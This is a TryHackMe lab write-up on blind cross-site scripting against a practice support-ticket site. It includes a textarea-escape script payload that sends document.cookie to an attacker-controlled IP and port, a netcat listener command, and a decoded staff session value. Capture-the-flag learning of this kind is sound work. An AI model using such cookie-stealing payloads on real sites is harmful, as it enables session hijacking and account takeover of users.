Cross Site Scripting (XSS) | TryHackMe.com

In this exercise we are going to look at a practical example of a Blind XSS and attempt to decode the value of the staff-session cookie.

in this task, you are required to test for XSS injection in the Acme IT Support website, by creating a payload in the support ticket section and then trying to capture the staff cookie in which you should decode with https://www.base64decode.org/

Step 1.

create an account with Acme IT Support and create a ticket.

viewing the page source shows our message goes inside the textarea. we need to escape this with a payload

Now we can confirm that { </textarea><script>alert(‘THM’);</script> works.

Now that we are sure the site is vulnerable to XSS, we can make a payload to steal the cookie information.

</textarea><script>fetch('http://ip_adress:port?cookie=' + btoa(document.cookie));</script>

before sending the above payload. set up a connection with netcat to the same port as above

@root# nc -lnvp 9001

capture of the nc listening for connections.

After running the the payload to capture the document.cookie (stores cookies) we get the cookie value as shown below. Now lets decode it

You can decode the cookie in two ways.

1. using https://www.base64decode.org/
2. using terminal

echo 'cookie value' | base64 -d

Hurray! you got your Staff-Session Value 4AB305E55955197693F01D6F8FD2D321